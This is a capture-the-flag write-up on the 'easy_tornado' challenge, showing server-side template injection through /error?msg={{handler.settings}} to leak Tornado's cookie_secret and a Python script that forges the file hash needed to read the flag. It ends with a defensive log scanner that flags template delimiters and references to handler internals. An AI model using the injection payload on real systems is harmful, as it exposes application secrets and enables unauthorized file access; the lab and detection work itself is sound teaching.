Vulnerability recurrence easy_ tornado
2022-07-07 08:10:00 【_ s1mple】
[Environment]
Windows
[Tools]
Firefox
[Steps]
Tornado is one of Python's web application frameworks.
Opening the challenge, we find three files:

flag.txt
/flag.txt
flag in /fllllllllllllag
The flag is in the file /fllllllllllllag.
welcome.txt
/welcome.txt
render
render is a rendering function in Python: it renders variables into a template, so different pages can be produced by passing different parameters.
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))
So filehash = md5(cookie_secret + md5(filename)). We already know filename=/fllllllllllllag, so we only need cookie_secret to access the flag.
While testing I also found an error endpoint of the form /error?msg=Error, which suggests a server-side template injection (SSTI) vulnerability.
Try /error?msg={{datetime}}: in Tornado's front-end page templates, datetime refers to Python's datetime module. Tornado provides a number of object aliases for quick access to objects; see the official Tornado documentation.

Looking through the documentation, cookie_secret is in the settings attribute of the Application object, and self.application.settings also has an alias:
RequestHandler.settings
An alias for self.application.settings.
handler is the RequestHandler object handling the current page, and RequestHandler.settings points to self.application.settings, so handler.settings points to RequestHandler.application.settings.
Construct the payload to obtain cookie_secret:
/error?msg={{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
Calculate the filehash value:
import hashlib

def md5(s):
    # hashlib digests bytes, so encode the str first
    # (calling update() with a str fails on Python 3)
    return hashlib.md5(s.encode()).hexdigest()

def filehash():
    filename = '/fllllllllllllag'
    cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
    # From hints.txt: filehash = md5(cookie_secret + md5(filename))
    return md5(cookie_secret + md5(filename))

if __name__ == '__main__':
    print(filehash())

Payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))
This returns the flag.
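As an added example from the defender's side (not part of the original write-up), here is a small Python scanner run over constructed access-log lines. It flags query parameters that carry Tornado template delimiters ({{, }}, {%, %}) or that name handler.settings / cookie_secret, which are the indicators the requests in this write-up leave in a server log; it also decodes a second time to catch double-percent-encoding. The log lines, IP address and response sizes are constructed for the example, and the function names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (not from the original write-up). Lines 3 and 4
# carry the URL-encoded template syntax that the requests in this write-up would leave.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2022:08:10:01 +0000] "GET /file?filename=/welcome.txt&filehash=0a1b2c HTTP/1.1" 200 512
10.0.0.5 - - [07/Jul/2022:08:10:07 +0000] "GET /error?msg=Error HTTP/1.1" 200 40
10.0.0.5 - - [07/Jul/2022:08:10:12 +0000] "GET /error?msg=%7B%7Bdatetime%7D%7D HTTP/1.1" 200 60
10.0.0.5 - - [07/Jul/2022:08:10:19 +0000] "GET /error?msg=%7B%7Bhandler.settings%7D%7D HTTP/1.1" 200 900
"""

# Tornado template delimiters; none of them belong in an ordinary query parameter.
TEMPLATE_MARKERS = re.compile(r"\{\{|\}\}|\{%|%\}")
# Names the write-up reaches through the template; seeing them in a parameter is a strong signal.
SENSITIVE_NAMES = ("handler.settings", "cookie_secret")

# Common-log-format request line: method, target (path + query), status code, response bytes.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)')


def scan_request_target(target):
    """Return (param, decoded_value, reason) findings for one request target."""
    findings = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already percent-decodes once; a second unquote() also catches
        # double-encoded payloads such as %257B (-> %7B -> {).
        decoded = unquote(value)
        if TEMPLATE_MARKERS.search(decoded):
            findings.append((name, decoded, "template delimiters in parameter"))
        if any(s in decoded for s in SENSITIVE_NAMES):
            findings.append((name, decoded, "reference to Tornado handler internals"))
    return findings


def scan_log(text):
    """Return one alert dict per request whose query string looks like template injection."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        findings = scan_request_target(m.group("target"))
        if findings:
            alerts.append({
                "line": lineno,
                "path": urlsplit(m.group("target")).path,
                "status": int(m.group("status")),
                "size": int(m.group("size")) if m.group("size") != "-" else 0,
                "findings": findings,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"line {alert['line']}: {alert['path']} -> {alert['findings']} "
              f"({alert['size']} bytes returned)")
```

The response size is kept in each alert on purpose: a settings dump is far larger than a normal error page, so a jump in bytes returned for /error alongside template delimiters in msg is a useful second signal when tuning the rule. The real fix is on the application side: pass msg to the template as a variable rather than building the template string from request input.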